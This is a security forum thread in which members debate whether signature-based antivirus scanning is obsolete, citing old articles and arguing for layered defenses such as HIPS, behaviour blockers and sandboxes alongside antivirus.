Is Anti-Virus Scanning/Detection Obsolete?

  • Thread starter Deleted member 178
  • Start date
D

Deleted member 178

Thread author
The title and topic of this article is clearly controversial. It is guaranteed to get a strong reaction from the anti-virus industry, which is firmly convinced it sees clear sailing ahead. So, is anti-virus scanning obsolete? In a word, yes - but don’t throw out your scanner. Its replacement hasn’t been created yet. In this article we will examine the weaknesses of virus scanning that will cause its eventual downfall.

Anti-virus scanning is based upon the age-old principle of Newton’s law; for every action there is an equal and opposite reaction. Each time a new virus, or a new viral approach, is discovered, anti-virus scanners must be updated. To be sure, this isn’t always true. Heuristic scanning does have the capability to recognize some attacks as viral without having specific detection for the virus it has alerted on. In general, however, each new virus discovery requires an update of the scanning software’s “virus definition” files in order for the scanner to recognize the new virus.

In some cases (Melissa, for example) the scan “engine” (the algorithm that does the comparison between the virus’ behavior and the virus definition files and identifies viral content) must also be updated for the anti-virus scanner to be effective at detection (and hopefully eradication.) This constant updating process has several flaws. We’ll look at these flaws in detail.

Source

if you pick the average person off the street and ask them about information security, most of them will likely associate the term with the antivirus software on their computers. Most "civilians" are unfamiliar with terms such as "HIPS," "IDS," "IPS" and the vast assortment of other security products commonly in use. Those sorts of things operate behind the scenes. But, AV packages are widely deployed and are often offered free of charge when you buy a new computer -- at least for the first 30 days.

But, as the malware war continues to escalate, it is reasonable to question the level of effectiveness that antivirus software, as a category, brings to the table.

"When last I looked, there were 78,500,000 unique instances of malware, according to AV-Test.org," said Paul Henry, security and forensic analyst at Lumension, a Scottsdale, Ariz.-based endpoint security company. "How in the world is anyone going to keep up with the signatures to inspect that large of a database?"

Source


Old articles but still valid.
 

spywar

Level 11
Oct 26, 2012
1,011
Of course this is obsolete .... Who does not know ?
That's why Symantec developped Norton Insight which is quite powerfull ...
Comodo's developped autosandboxing tech based on DDP (anything not whitelisted is run inside autosandbox)
Avast's developped autosandboxing tech based on FileRep and others things (anything with low rep is run inside autosandbox)...

off topic: Please reply to my last PM.
 
D

Deleted member 178

Thread author
I posted it because many new members of various knowledge level still choose their AV only by detection results made by so-called "independent test labs"
 

spywar

Level 11
Oct 26, 2012
1,011
True, that statement is true.

Things like this http://threatcenter.crdf.fr/?Stats
Are obviously useless.
 
D

Deleted member 178

Thread author
spywar said:
Things like this http://threatcenter.crdf.fr/?Stats
Are obviously useless.

the favorite test lab of comodo fans :p (one of the few that test CIS)
 

spywar

Level 11
Oct 26, 2012
1,011
Why is PCtools the 5th while Symantec is 19th ? .... Don't they use the same signatures ?
 
D

Deleted member 178

Thread author
i dont know since i dont trust test labs
 
I

illumination

Thread author
Umbra Corp. said:
i dont know since i dont trust test labs

You dont trust that Emsisioft is only hitting 17% detection rate with it's dual engine, while McAfee hit 41%.. :lol: ;) :D

You know i couldnt resist Umbra, i dont trust these test's any more then you do..
 

Jack

Administrator
Verified
Staff Member
Well-known
Jan 24, 2011
9,377
No, the antivirus is not obsolete, and is very useful.
A good antivirus engine will detect 85% of the new zero day threats, and if the malware is has been in the wild for awhile it has even a higher chance of detecting the malicious file.

Unlike a HIPS or a Sandbox, which are used to protect the system from unwanted modifications or attacks, an antivirus will actually give the user a verdict, which will clearly indicate if the file is malicious or not.
The fact that an antivirus can detect a malicious file before executing it or while it's running, and the alerting the users with the clear statement : THIS FILE IS INFECTED! YOU NEED TO REMOVE IT ... it's the most security friendly approach for most users.
A HIPS or a Sandbox will protect the system however they can't detect the malicious files, they will just block certain operation or ask the user (With a confusing message: This files wants to do this, do yo want to allow this?) no matter if the file is malicious or not.


So, is the antivirus obsolete ? NO, definitely no! When you want to really secure a laptop for the regular users, you need to use a combination between an antivirus, HIPS, BB and Sandbox. A combination between these layers is need it do really protect a system.

An antivirus will not only bring a detection into any security setup, however it will also take a lot of the responsibility from the users security decisions......
 

spywar

Level 11
Oct 26, 2012
1,011
Jack said:
No, the antivirus is not obsolete, and is very useful.
A good antivirus engine will detect 85% of the new zero day threats, and if the malware is has been in the wild for awhile it has even a higher chance of detecting the malicious file.

Unlike a HIPS or a Sandbox, which are used to protect the system from unwanted modifications or attacks, an antivirus will actually give the user a verdict, which will clearly indicate if the file is malicious or not.
The fact that an antivirus can detect a malicious file before executing it or while it's running, and the alerting the users with the clear statement : THIS FILE IS INFECTED! YOU NEED TO REMOVE IT ... it's the most security friendly approach for most users.
A HIPS or a Sandbox will protect the system however they can't detect the malicious files, they will just block certain operation or ask the user (With a confusing message: This files wants to do this, do yo want to allow this?) no matter if the file is malicious or not.


So, is the antivirus obsolete ? NO, definitely no! When you want to really secure a laptop for the regular users, you need to use a combination between an antivirus, HIPS, BB and Sandbox. A combination between these layers is need it do really protect a system.

An antivirus will not only bring a detection into any security setup, however it will also take a lot of the responsibility from the users security decisions......
Completely true !
However, this statement "A HIPS or a Sandbox will protect the system however they can't detect the malicious files" is not 100% sure.
For example :

.If CIMA detects a malicious behavior for the unknown file which has previously been sandboxed, then the users will get an alert : CloudBehavior.Suspicious ...

.If Avast's Autosandbox detects the file to be a malware using the Dyna rules, then the users will get an alert very clear : Avast's AutoSandbox has blocked a malware etc ...
 
I

illumination

Thread author
Jack said:
No, the antivirus is not obsolete, and is very useful.
A good antivirus engine will detect 85% of the new zero day threats, and if the malware is has been in the wild for awhile it has even a higher chance of detecting the malicious file.

Unlike a HIPS or a Sandbox, which are used to protect the system from unwanted modifications or attacks, an antivirus will actually give the user a verdict, which will clearly indicate if the file is malicious or not.
The fact that an antivirus can detect a malicious file before executing it or while it's running, and the alerting the users with the clear statement : THIS FILE IS INFECTED! YOU NEED TO REMOVE IT ... it's the most security friendly approach for most users.
A HIPS or a Sandbox will protect the system however they can't detect the malicious files, they will just block certain operation or ask the user (With a confusing message: This files wants to do this, do yo want to allow this?) no matter if the file is malicious or not.


So, is the antivirus obsolete ? NO, definitely no! When you want to really secure a laptop for the regular users, you need to use a combination between an antivirus, HIPS, BB and Sandbox. A combination between these layers is need it do really protect a system.

An antivirus will not only bring a detection into any security setup, however it will also take a lot of the responsibility from the users security decisions......

Exactly Jack, thank you, i have been trying to say this in many different ways. AV's are your front line defense, if anything makes it past the AV, then the HIPS/BB/virtualization can come into play. Now days it is wise to use all of the above in over lapping field of protection.

It is as you said, for most novice users, the most security friendly approach.
 

jamescv7

Level 85
Verified
Honorary Member
Mar 15, 2011
13,070
Anti-Virus Scanning and Detection is still an effective until now perhaps a main solution when malware/viruses appeared even the beginning of the era.

And this generation they existed on some defense layer protection to help with the traditional why of preventing those threats but it would not be an obsolete.

Plus for users they felt confidence with an AV running in their systems.
 

spywar

Level 11
Oct 26, 2012
1,011
Automated analysis systems work pretty well ... Be prepared to see more of them : Valkyrie/APC (Avira Protection Cloud that will be part of Avira free AV soon or later). AI engines work very well to detect zero day threats.
 

Gnosis

Level 5
Apr 26, 2011
2,779
Think "eclectic collection" as it might pertain to a solid malware defense

What is good for some of us will not do for the masses. A suite, whether you make your own with freeware, or buy it from G-Data or ESET, is needed more and more these days, esp. with the gov/military issues stuff floating around as fallout from their cyber wars. An AV, as Illumination stated, is the front line. Scanning or checking for false program logic will always be needed as well.
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top